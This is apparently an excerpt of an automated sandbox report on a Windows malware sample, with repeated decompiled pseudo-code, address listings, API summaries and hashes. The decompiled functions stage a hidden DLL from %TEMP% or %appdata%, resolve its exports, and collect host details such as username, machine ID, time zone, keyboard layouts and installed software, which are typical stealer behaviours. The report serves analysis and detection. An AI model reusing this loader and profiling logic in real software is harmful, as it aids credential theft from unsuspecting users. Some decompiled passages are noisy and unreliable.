				 *0x41b0d8 = 0;
				E00406C4C( &_v28, 0x41c7bc, __esi);
				E00406258(_v28, 0x41c7bc,  &_v24, __esi, _t274);
				E00406258(_v24, 0x41c7bc,  &_v20, _t268, _t274);
				E00403D2C( &_v16, _v20);
				_push(L"%TEMP%\\");
				_push(_v16);
				_push(0x4087a8);
				E00403E1C();
				E004062D8(_v36,  &_v32, _t274);
				E00403BBC(0x41c7c0, _v32);
				CreateDirectoryW(E00403D3C( *0x41c7c0), 0);
				E004081A0( *0x41c7c0, 0x41c7bc, _v8, _t268, _t274);
				E0040813C(9,  &_v44);
				E00403DB8( &_v40, _v44,  *0x41c7c0, _t274);
				_t95 = E004076B0(_v40, 0x41c7bc, _v44);
				_t275 = _t95;
				if(_t95 == 0) {
					_push(L"%appdata%\\");
					_push(_v16);
					_push(0x4087a8);
					E00403E1C();
					E004062D8(_v52,  &_v48, _t275);
					E00403BBC(0x41c7c0, _v48);
					CreateDirectoryW(E00403D3C( *0x41c7c0), 0);
					E004081A0( *0x41c7c0, 0x41c7bc, _v8, _t268, _t275);
				}
				_t96 =  *0x41b578; // 0x41c6b0
				_t269 =  *((intOrPtr*)( *_t96))(L"PATH", 0, 0);
				_t276 = _t269;
				if(_t269 > 0) {
					E004040B0( &_v12, _t269);
					_t210 =  *0x41b578; // 0x41c6b0
					 *((intOrPtr*)( *_t210))(L"PATH", E00403D3C(_v12), _t269);
				}
				E00403E1C();
				_t102 =  *0x41b614; // 0x41c6ac
				 *((intOrPtr*)( *_t102))(L"PATH", E00403D3C(_v12), _v12, E004087D8,  *0x41c7c0);
				_t107 =  *0x41b5e4; // 0x41c6b4
				 *((intOrPtr*)( *_t107))(E00403D3C( *0x41c7c0));
				E0040813C(9,  &_v60);
				E00403DB8( &_v56, _v60,  *0x41c7c0, _t276);
				 *0x41c7bc = LoadLibraryExW(E00403D3C(_v56), 0, 8);
				if( *0x41c7bc != 0) {
					E00408120(0x84,  &_v64);
					 *0x41c784 = GetProcAddress( *0x41c7bc, E00403990(_v64));
					E00408120(0x85,  &_v68);
					 *0x41c788 = GetProcAddress( *0x41c7bc, E00403990(_v68));
					E00408120(0x86,  &_v72);
					 *0x41c78c = GetProcAddress( *0x41c7bc, E00403990(_v72));
					E00408120(0x87,  &_v76);
					 *0x41c790 = GetProcAddress( *0x41c7bc, E00403990(_v76));
					E00408120(0x88,  &_v80);
					 *0x41c794 = GetProcAddress( *0x41c7bc, E00403990(_v80));
					E00408120(0x89,  &_v84);
					 *0x41c798 = GetProcAddress( *0x41c7bc, E00403990(_v84));
					E00408120(0x8a,  &_v88);
					 *0x41c79c = GetProcAddress( *0x41c7bc, E00403990(_v88));
					E00408120(0x12,  &_v92);
					 *0x41c7a0 = GetProcAddress( *0x41c7bc, E00403990(_v92));
					E00408120(0x13,  &_v96);
					 *0x41c7a4 = GetProcAddress( *0x41c7bc, E00403990(_v96));
					E00408120(0x14,  &_v100);
					 *0x41c7a8 = GetProcAddress( *0x41c7bc, E00403990(_v100));
					E00408120(0x15,  &_v104);
					 *0x41c7ac = GetProcAddress( *0x41c7bc, E00403990(_v104));
					E00408120(0x16,  &_v108);
					 *0x41c7b0 = GetProcAddress( *0x41c7bc, E00403990(_v108));
					E00408120(0x17,  &_v112);
					 *0x41c7b4 = GetProcAddress( *0x41c7bc, E00403990(_v112));
					if( *0x41c784 != 0 &&  *0x41c788 != 0 &&  *0x41c78c != 0 &&  *0x41c790 != 0 &&  *0x41c794 != 0 &&  *0x41c798 != 0 &&  *0x41c79c != 0 &&  *0x41c7a0 != 0 &&  *0x41c7a4 != 0 &&  *0x41c7a8 != 0 &&  *0x41c7ac != 0 &&  *0x41c7b0 != 0 &&  *0x41c7b4 != 0) {
						 *0x41b0d8 = 1;
					}
				}
				_pop(_t243);
				 *[fs:eax] = _t243;
				_push(E00408788);
				E00403508( &_v112, 0xd);
				E00403B98( &_v60, 8);
				E00403508( &_v28, 3);
				E00403B98( &_v16, 2);
				return E004034E4( &_v8);
			}









































                                                                                                                                                                                              0x00408324
                                                                                                                                                                                              0x00408324
                                                                                                                                                                                              0x00408325
                                                                                                                                                                                              0x00408327
                                                                                                                                                                                              0x00408329
                                                                                                                                                                                              0x0040832b
                                                                                                                                                                                              0x00408330
                                                                                                                                                                                              0x00408330
                                                                                                                                                                                              0x00408332
                                                                                                                                                                                              0x00408334
                                                                                                                                                                                              0x00408334
                                                                                                                                                                                              0x00408334
                                                                                                                                                                                              0x00408337
                                                                                                                                                                                              0x00408338
                                                                                                                                                                                              0x00408339
                                                                                                                                                                                              0x0040833b
                                                                                                                                                                                              0x00408341
                                                                                                                                                                                              0x00408352
                                                                                                                                                                                              0x00408353
                                                                                                                                                                                              0x00408358
                                                                                                                                                                                              0x0040835b
                                                                                                                                                                                              0x0040835e
                                                                                                                                                                                              0x00408368
                                                                                                                                                                                              0x00408373
                                                                                                                                                                                              0x0040837e
                                                                                                                                                                                              0x00408389
                                                                                                                                                                                              0x0040838e
                                                                                                                                                                                              0x00408393
                                                                                                                                                                                              0x00408396
                                                                                                                                                                                              0x004083a3
                                                                                                                                                                                              0x004083ae
                                                                                                                                                                                              0x004083b8
                                                                                                                                                                                              0x004083c7
                                                                                                                                                                                              0x004083d1
                                                                                                                                                                                              0x004083de
                                                                                                                                                                                              0x004083eb
                                                                                                                                                                                              0x004083f3
                                                                                                                                                                                              0x004083f8
                                                                                                                                                                                              0x004083fa
                                                                                                                                                                                              0x004083fc
                                                                                                                                                                                              0x00408401
                                                                                                                                                                                              0x00408404
                                                                                                                                                                                              0x00408411
                                                                                                                                                                                              0x0040841c
                                                                                                                                                                                              0x00408426
                                                                                                                                                                                              0x00408435
                                                                                                                                                                                              0x0040843f
                                                                                                                                                                                              0x0040843f
                                                                                                                                                                                              0x0040844d
                                                                                                                                                                                              0x00408456
                                                                                                                                                                                              0x00408458
                                                                                                                                                                                              0x0040845a
                                                                                                                                                                                              0x00408461
                                                                                                                                                                                              0x00408475
                                                                                                                                                                                              0x0040847c
                                                                                                                                                                                              0x0040847c
                                                                                                                                                                                              0x00408490
                                                                                                                                                                                              0x004084a3
                                                                                                                                                                                              0x004084aa
                                                                                                                                                                                              0x004084b4
                                                                                                                                                                                              0x004084bb
                                                                                                                                                                                              0x004084c9
                                                                                                                                                                                              0x004084d6
                                                                                                                                                                                              0x004084e9
                                                                                                                                                                                              0x004084ee
                                                                                                                                                                                              0x004084fc
                                                                                                                                                                                              0x00408512
                                                                                                                                                                                              0x0040851f
                                                                                                                                                                                              0x00408535
                                                                                                                                                                                              0x00408542
                                                                                                                                                                                              0x00408558
                                                                                                                                                                                              0x00408565
                                                                                                                                                                                              0x0040857b
                                                                                                                                                                                              0x00408588
                                                                                                                                                                                              0x0040859e
                                                                                                                                                                                              0x004085ab
                                                                                                                                                                                              0x004085c1
                                                                                                                                                                                              0x004085ce
                                                                                                                                                                                              0x004085e4
                                                                                                                                                                                              0x004085f1
                                                                                                                                                                                              0x00408607
                                                                                                                                                                                              0x00408614
                                                                                                                                                                                              0x0040862a
                                                                                                                                                                                              0x00408637
                                                                                                                                                                                              0x0040864d
                                                                                                                                                                                              0x0040865a
                                                                                                                                                                                              0x00408670
                                                                                                                                                                                              0x0040867d
                                                                                                                                                                                              0x00408693
                                                                                                                                                                                              0x004086a0
                                                                                                                                                                                              0x004086b6
                                                                                                                                                                                              0x004086c2
                                                                                                                                                                                              0x00408730
                                                                                                                                                                                              0x00408730
                                                                                                                                                                                              0x004086c2
                                                                                                                                                                                              0x00408739
                                                                                                                                                                                              0x0040873c
                                                                                                                                                                                              0x0040873f
                                                                                                                                                                                              0x0040874c
                                                                                                                                                                                              0x00408759
                                                                                                                                                                                              0x00408766
                                                                                                                                                                                              0x00408773
                                                                                                                                                                                              0x00408780

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D), ref: 004083C7
                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%appdata%\,00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D), ref: 00408435
                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000008,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D,?,?,?,00000000), ref: 004084E4
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040850D
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408530
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408553
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408576
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408599
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 004085BC
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 004085DF
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408602
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408625
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408648
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040866B
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040868E
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 004086B1
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressProc$CreateDirectory$LibraryLoad
                                                                                                                                                                                              • String ID: %TEMP%\$%appdata%\$PATH
                                                                                                                                                                                              • API String ID: 1305945209-1089150275
                                                                                                                                                                                              • Opcode ID: 79934f1c985d954dbaeb093b53ec4003d150750486ead7d04ba29fc2d927e3f7
                                                                                                                                                                                              • Instruction ID: 2d8dd4a76802c8c05b7f9f6fb250e21a54e9375513618aa46567d80ce5eb0686
                                                                                                                                                                                              • Opcode Fuzzy Hash: 79934f1c985d954dbaeb093b53ec4003d150750486ead7d04ba29fc2d927e3f7
                                                                                                                                                                                              • Instruction Fuzzy Hash: A7C12A70A002059BDB01EBA9DD86BCE77B8EF45308F20453BB454BB3D5CB78AD058B59
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00408328, Relevance: 33.6, APIs: 16, Strings: 3, Instructions: 317libraryloaderCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 72%
                                                                                                                                                                                              			E00408328(char __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr _v36;
				char _v40;
				char _v44;
				char _v48;
				intOrPtr _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				void* _t93;
				intOrPtr* _t94;
				intOrPtr* _t100;
				intOrPtr* _t105;
				intOrPtr* _t208;
				void* _t223;
				intOrPtr _t241;
				void* _t267;
				intOrPtr _t269;
				intOrPtr _t270;

				_t266 = __esi;
				_t269 = _t270;
				_t223 = 0xd;
				do {
					_push(0);
					_push(0);
					_t223 = _t223 - 1;
					_t271 = _t223;
				} while (_t223 != 0);
				_push(_t223);
				_push(__ebx);
				_push(__esi);
				_v8 = __eax;
				E00403980(_v8);
				_push(_t269);
				_push(0x408781);
				_push( *[fs:eax]);
				 *[fs:eax] = _t270;
				 *0x41b0d8 = 0;
				E00406C4C( &_v28, 0x41c7bc, __esi);
				E00406258(_v28, 0x41c7bc,  &_v24, __esi, _t271);
				E00406258(_v24, 0x41c7bc,  &_v20, _t266, _t271);
				E00403D2C( &_v16, _v20);
				_push(L"%TEMP%\\");
				_push(_v16);
				_push(0x4087a8);
				E00403E1C();
				E004062D8(_v36,  &_v32, _t271);
				E00403BBC(0x41c7c0, _v32);
				CreateDirectoryW(E00403D3C( *0x41c7c0), 0);
				E004081A0( *0x41c7c0, 0x41c7bc, _v8, _t266, _t271);
				E0040813C(9,  &_v44);
				E00403DB8( &_v40, _v44,  *0x41c7c0, _t271);
				_t93 = E004076B0(_v40, 0x41c7bc, _v44);
				_t272 = _t93;
				if(_t93 == 0) {
					_push(L"%appdata%\\");
					_push(_v16);
					_push(0x4087a8);
					E00403E1C();
					E004062D8(_v52,  &_v48, _t272);
					E00403BBC(0x41c7c0, _v48);
					CreateDirectoryW(E00403D3C( *0x41c7c0), 0);
					E004081A0( *0x41c7c0, 0x41c7bc, _v8, _t266, _t272);
				}
				_t94 =  *0x41b578; // 0x41c6b0
				_t267 =  *((intOrPtr*)( *_t94))(L"PATH", 0, 0);
				_t273 = _t267;
				if(_t267 > 0) {
					E004040B0( &_v12, _t267);
					_t208 =  *0x41b578; // 0x41c6b0
					 *((intOrPtr*)( *_t208))(L"PATH", E00403D3C(_v12), _t267);
				}
				E00403E1C();
				_t100 =  *0x41b614; // 0x41c6ac
				 *((intOrPtr*)( *_t100))(L"PATH", E00403D3C(_v12), _v12, E004087D8,  *0x41c7c0);
				_t105 =  *0x41b5e4; // 0x41c6b4
				 *((intOrPtr*)( *_t105))(E00403D3C( *0x41c7c0));
				E0040813C(9,  &_v60);
				E00403DB8( &_v56, _v60,  *0x41c7c0, _t273);
				 *0x41c7bc = LoadLibraryExW(E00403D3C(_v56), 0, 8);
				if( *0x41c7bc != 0) {
					E00408120(0x84,  &_v64);
					 *0x41c784 = GetProcAddress( *0x41c7bc, E00403990(_v64));
					E00408120(0x85,  &_v68);
					 *0x41c788 = GetProcAddress( *0x41c7bc, E00403990(_v68));
					E00408120(0x86,  &_v72);
					 *0x41c78c = GetProcAddress( *0x41c7bc, E00403990(_v72));
					E00408120(0x87,  &_v76);
					 *0x41c790 = GetProcAddress( *0x41c7bc, E00403990(_v76));
					E00408120(0x88,  &_v80);
					 *0x41c794 = GetProcAddress( *0x41c7bc, E00403990(_v80));
					E00408120(0x89,  &_v84);
					 *0x41c798 = GetProcAddress( *0x41c7bc, E00403990(_v84));
					E00408120(0x8a,  &_v88);
					 *0x41c79c = GetProcAddress( *0x41c7bc, E00403990(_v88));
					E00408120(0x12,  &_v92);
					 *0x41c7a0 = GetProcAddress( *0x41c7bc, E00403990(_v92));
					E00408120(0x13,  &_v96);
					 *0x41c7a4 = GetProcAddress( *0x41c7bc, E00403990(_v96));
					E00408120(0x14,  &_v100);
					 *0x41c7a8 = GetProcAddress( *0x41c7bc, E00403990(_v100));
					E00408120(0x15,  &_v104);
					 *0x41c7ac = GetProcAddress( *0x41c7bc, E00403990(_v104));
					E00408120(0x16,  &_v108);
					 *0x41c7b0 = GetProcAddress( *0x41c7bc, E00403990(_v108));
					E00408120(0x17,  &_v112);
					 *0x41c7b4 = GetProcAddress( *0x41c7bc, E00403990(_v112));
					if( *0x41c784 != 0 &&  *0x41c788 != 0 &&  *0x41c78c != 0 &&  *0x41c790 != 0 &&  *0x41c794 != 0 &&  *0x41c798 != 0 &&  *0x41c79c != 0 &&  *0x41c7a0 != 0 &&  *0x41c7a4 != 0 &&  *0x41c7a8 != 0 &&  *0x41c7ac != 0 &&  *0x41c7b0 != 0 &&  *0x41c7b4 != 0) {
						 *0x41b0d8 = 1;
					}
				}
				_pop(_t241);
				 *[fs:eax] = _t241;
				_push(E00408788);
				E00403508( &_v112, 0xd);
				E00403B98( &_v60, 8);
				E00403508( &_v28, 3);
				E00403B98( &_v16, 2);
				return E004034E4( &_v8);
			}








































                                                                                                                                                                                              0x00408328
                                                                                                                                                                                              0x00408329
                                                                                                                                                                                              0x0040832b
                                                                                                                                                                                              0x00408330
                                                                                                                                                                                              0x00408330
                                                                                                                                                                                              0x00408332
                                                                                                                                                                                              0x00408334
                                                                                                                                                                                              0x00408334
                                                                                                                                                                                              0x00408334
                                                                                                                                                                                              0x00408337
                                                                                                                                                                                              0x00408338
                                                                                                                                                                                              0x00408339
                                                                                                                                                                                              0x0040833b
                                                                                                                                                                                              0x00408341
                                                                                                                                                                                              0x00408352
                                                                                                                                                                                              0x00408353
                                                                                                                                                                                              0x00408358
                                                                                                                                                                                              0x0040835b
                                                                                                                                                                                              0x0040835e
                                                                                                                                                                                              0x00408368
                                                                                                                                                                                              0x00408373
                                                                                                                                                                                              0x0040837e
                                                                                                                                                                                              0x00408389
                                                                                                                                                                                              0x0040838e
                                                                                                                                                                                              0x00408393
                                                                                                                                                                                              0x00408396
                                                                                                                                                                                              0x004083a3
                                                                                                                                                                                              0x004083ae
                                                                                                                                                                                              0x004083b8
                                                                                                                                                                                              0x004083c7
                                                                                                                                                                                              0x004083d1
                                                                                                                                                                                              0x004083de
                                                                                                                                                                                              0x004083eb
                                                                                                                                                                                              0x004083f3
                                                                                                                                                                                              0x004083f8
                                                                                                                                                                                              0x004083fa
                                                                                                                                                                                              0x004083fc
                                                                                                                                                                                              0x00408401
                                                                                                                                                                                              0x00408404
                                                                                                                                                                                              0x00408411
                                                                                                                                                                                              0x0040841c
                                                                                                                                                                                              0x00408426
                                                                                                                                                                                              0x00408435
                                                                                                                                                                                              0x0040843f
                                                                                                                                                                                              0x0040843f
                                                                                                                                                                                              0x0040844d
                                                                                                                                                                                              0x00408456
                                                                                                                                                                                              0x00408458
                                                                                                                                                                                              0x0040845a
                                                                                                                                                                                              0x00408461
                                                                                                                                                                                              0x00408475
                                                                                                                                                                                              0x0040847c
                                                                                                                                                                                              0x0040847c
                                                                                                                                                                                              0x00408490
                                                                                                                                                                                              0x004084a3
                                                                                                                                                                                              0x004084aa
                                                                                                                                                                                              0x004084b4
                                                                                                                                                                                              0x004084bb
                                                                                                                                                                                              0x004084c9
                                                                                                                                                                                              0x004084d6
                                                                                                                                                                                              0x004084e9
                                                                                                                                                                                              0x004084ee
                                                                                                                                                                                              0x004084fc
                                                                                                                                                                                              0x00408512
                                                                                                                                                                                              0x0040851f
                                                                                                                                                                                              0x00408535
                                                                                                                                                                                              0x00408542
                                                                                                                                                                                              0x00408558
                                                                                                                                                                                              0x00408565
                                                                                                                                                                                              0x0040857b
                                                                                                                                                                                              0x00408588
                                                                                                                                                                                              0x0040859e
                                                                                                                                                                                              0x004085ab
                                                                                                                                                                                              0x004085c1
                                                                                                                                                                                              0x004085ce
                                                                                                                                                                                              0x004085e4
                                                                                                                                                                                              0x004085f1
                                                                                                                                                                                              0x00408607
                                                                                                                                                                                              0x00408614
                                                                                                                                                                                              0x0040862a
                                                                                                                                                                                              0x00408637
                                                                                                                                                                                              0x0040864d
                                                                                                                                                                                              0x0040865a
                                                                                                                                                                                              0x00408670
                                                                                                                                                                                              0x0040867d
                                                                                                                                                                                              0x00408693
                                                                                                                                                                                              0x004086a0
                                                                                                                                                                                              0x004086b6
                                                                                                                                                                                              0x004086c2
                                                                                                                                                                                              0x00408730
                                                                                                                                                                                              0x00408730
                                                                                                                                                                                              0x004086c2
                                                                                                                                                                                              0x00408739
                                                                                                                                                                                              0x0040873c
                                                                                                                                                                                              0x0040873f
                                                                                                                                                                                              0x0040874c
                                                                                                                                                                                              0x00408759
                                                                                                                                                                                              0x00408766
                                                                                                                                                                                              0x00408773
                                                                                                                                                                                              0x00408780

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D), ref: 004083C7
                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,004087A8,00000000,%appdata%\,00000000,00000000,004087A8,00000000,%TEMP%\,00000000,00408781,?,?,0041B0FC,0000044D), ref: 00408435
                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000008,?,?,0041B0FC,0000044D,0000000C,00000000,00000000,?,0041930D,?,?,?,00000000), ref: 004084E4
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040850D
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408530
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408553
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408576
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408599
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 004085BC
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 004085DF
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408602
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408625
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408648
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040866B
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040868E
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 004086B1
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressProc$CreateDirectory$LibraryLoad
                                                                                                                                                                                              • String ID: %TEMP%\$%appdata%\$PATH
                                                                                                                                                                                              • API String ID: 1305945209-1089150275
                                                                                                                                                                                              • Opcode ID: 3e01a980fe06b71006a212d9f424134b77ef2a0a464c1b07fa2ce8f8b0dee680
                                                                                                                                                                                              • Instruction ID: f743aedec7dbf6b98949553c7d40f8bccc431f9c9a4af862cbdb08e619508236
                                                                                                                                                                                              • Opcode Fuzzy Hash: 3e01a980fe06b71006a212d9f424134b77ef2a0a464c1b07fa2ce8f8b0dee680
                                                                                                                                                                                              • Instruction Fuzzy Hash: A0C11A70A002059BDB01EBA9DD86BCE77B8EF48309F20453BB454BB3D5DB78AD058B59
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00417278, Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 213sleepCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 44%
                                                                                                                                                                                              			E00417278(intOrPtr* __eax, void* __ebx, intOrPtr* __edx, void* __esi) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				char _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				intOrPtr _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				signed char _t59;
				intOrPtr* _t60;
				intOrPtr* _t142;
				void* _t143;
				intOrPtr _t173;
				void* _t181;
				intOrPtr _t184;
				intOrPtr _t185;

				_t182 = __esi;
				_t59 = __eax +  *__eax;
				 *_t59 =  *_t59 + _t59;
				asm("das");
				 *_t59 =  *_t59 + _t59;
				 *__edx =  *__edx + _t59;
				 *_t59 =  *_t59 + _t59;
				 *_t59 =  *_t59 + _t59;
				 *_t59 =  *_t59 & _t59;
				 *_t59 =  *_t59 + _t59;
				_t60 = _t59 +  *_t59;
				 *_t60 =  *_t60 + _t60;
				 *_t60 =  *_t60 + _t60;
				_t184 = _t185;
				_t143 = 0xc;
				do {
					_push(0);
					_push(0);
					_t143 = _t143 - 1;
					_t191 = _t143;
				} while (_t143 != 0);
				_t142 = _t60;
				_push(_t184);
				_push(0x41757c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t185;
				_push("MachineID :   ");
				E00406C4C( &_v8, _t142, __esi);
				_push(_v8);
				_push(0x4175a8);
				E00403850();
				_push( *_t142);
				_push("EXE_PATH  :   ");
				E00416F88(0,  &_v12);
				_push(_v12);
				_push(0x4175cc);
				E00403850();
				_push( *_t142);
				_push("Windows    :   ");
				E00407A4C( &_v28, _t142, _t181, __esi);
				_push(_v28);
				_push(0x4175f4);
				E00403850();
				E00403D2C( &_v20, _v24);
				_push(_v20);
				E004066C0( &_v32, _t191);
				_push(_v32);
				_push(0x4175fc);
				E00406BB4( &_v36);
				_push(_v36);
				_push(0x417604);
				E00403E1C();
				E0040377C(_t142, _v16);
				E004037DC( &_v48, "Computer(Username) :   ",  *_t142);
				E00403D2C( &_v44, _v48);
				_push(_v44);
				E00406610( &_v52);
				_push(_v52);
				_push(0x417630);
				E004065CC( &_v56);
				_push(_v56);
				_push(0x417638);
				_push(0x417604);
				E00403E1C();
				E0040377C(_t142, _v40);
				E004037DC( &_v68, "Screen: ",  *_t142);
				E00403D2C( &_v64, _v68);
				_push(_v64);
				E00406FDC(GetSystemMetrics(0), _t142,  &_v72, __esi, _t191);
				_push(_v72);
				_push(0x417654);
				E00406FDC(GetSystemMetrics(1), _t142,  &_v76, _t182, _t191);
				_push(_v76);
				_push(0x417604);
				E00403E1C();
				E0040377C(_t142, _v60);
				_push( *_t142);
				_push("Layouts: ");
				E00416FB8( &_v80, _t142, _t181, _t182);
				_push(_v80);
				_push(0x4175a8);
				E00403850();
				_push( *_t142);
				_push("LocalTime: ");
				E00417198( &_v84, _t142, _t182);
				_push(_v84);
				_push(0x4175a8);
				E00403850();
				_push( *_t142);
				_push("Zone: ");
				E00417098( &_v88, _t142, _t181, _t182, _t191);
				_push(_v88);
				_push(0x4175cc);
				E00403850();
				_push( *_t142);
				E00416748( &_v92, _t142, _t181, _t182);
				_push(_v92);
				_push(0x4175cc);
				E00403850();
				Sleep(1);
				_push( *_t142);
				E00416B94( &_v96, _t142, _t181, _t182, _t191);
				_push(_v96);
				_push(0x4175a8);
				_push(0x4175a8);
				E00403850();
				Sleep(1);
				_push( *_t142);
				_push("[Soft]");
				E00403850();
				Sleep(1);
				E00415F30( &_v100, _t142, _t181, _t182);
				E00403798(_t142, _v100);
				_t173 = 0x4175a8;
				 *[fs:eax] = _t173;
				_push(E00417583);
				E00403508( &_v100, 6);
				E00403B98( &_v76, 2);
				E004034E4( &_v68);
				E00403B98( &_v64, 4);
				E004034E4( &_v48);
				E00403B98( &_v44, 4);
				E00403508( &_v28, 2);
				E00403B98( &_v20, 2);
				return E00403508( &_v12, 2);
			}



































                                                                                                                                                                                              0x00417278
                                                                                                                                                                                              0x00417278
                                                                                                                                                                                              0x0041727a
                                                                                                                                                                                              0x0041727c
                                                                                                                                                                                              0x0041727d
                                                                                                                                                                                              0x0041727f
                                                                                                                                                                                              0x00417281
                                                                                                                                                                                              0x00417283
                                                                                                                                                                                              0x00417284
                                                                                                                                                                                              0x00417286
                                                                                                                                                                                              0x00417288
                                                                                                                                                                                              0x0041728a
                                                                                                                                                                                              0x0041728e
                                                                                                                                                                                              0x00417291
                                                                                                                                                                                              0x00417293
                                                                                                                                                                                              0x00417298
                                                                                                                                                                                              0x00417298
                                                                                                                                                                                              0x0041729a
                                                                                                                                                                                              0x0041729c
                                                                                                                                                                                              0x0041729c
                                                                                                                                                                                              0x0041729c
                                                                                                                                                                                              0x004172a0
                                                                                                                                                                                              0x004172a4
                                                                                                                                                                                              0x004172a5
                                                                                                                                                                                              0x004172aa
                                                                                                                                                                                              0x004172ad
                                                                                                                                                                                              0x004172b0
                                                                                                                                                                                              0x004172b8
                                                                                                                                                                                              0x004172bd
                                                                                                                                                                                              0x004172c0
                                                                                                                                                                                              0x004172cc
                                                                                                                                                                                              0x004172d1
                                                                                                                                                                                              0x004172d3
                                                                                                                                                                                              0x004172dd
                                                                                                                                                                                              0x004172e2
                                                                                                                                                                                              0x004172e5
                                                                                                                                                                                              0x004172f1
                                                                                                                                                                                              0x004172f6
                                                                                                                                                                                              0x004172f8
                                                                                                                                                                                              0x00417300
                                                                                                                                                                                              0x00417305
                                                                                                                                                                                              0x00417308
                                                                                                                                                                                              0x00417315
                                                                                                                                                                                              0x00417320
                                                                                                                                                                                              0x00417325
                                                                                                                                                                                              0x0041732b
                                                                                                                                                                                              0x00417330
                                                                                                                                                                                              0x00417333
                                                                                                                                                                                              0x0041733b
                                                                                                                                                                                              0x00417340
                                                                                                                                                                                              0x00417343
                                                                                                                                                                                              0x00417350
                                                                                                                                                                                              0x0041735a
                                                                                                                                                                                              0x00417369
                                                                                                                                                                                              0x00417374
                                                                                                                                                                                              0x00417379
                                                                                                                                                                                              0x0041737f
                                                                                                                                                                                              0x00417384
                                                                                                                                                                                              0x00417387
                                                                                                                                                                                              0x0041738f
                                                                                                                                                                                              0x00417394
                                                                                                                                                                                              0x00417397
                                                                                                                                                                                              0x0041739c
                                                                                                                                                                                              0x004173a9
                                                                                                                                                                                              0x004173b3
                                                                                                                                                                                              0x004173c2
                                                                                                                                                                                              0x004173cd
                                                                                                                                                                                              0x004173d2
                                                                                                                                                                                              0x004173df
                                                                                                                                                                                              0x004173e4
                                                                                                                                                                                              0x004173e7
                                                                                                                                                                                              0x004173f6
                                                                                                                                                                                              0x004173fb
                                                                                                                                                                                              0x004173fe
                                                                                                                                                                                              0x0041740b
                                                                                                                                                                                              0x00417415
                                                                                                                                                                                              0x0041741a
                                                                                                                                                                                              0x0041741c
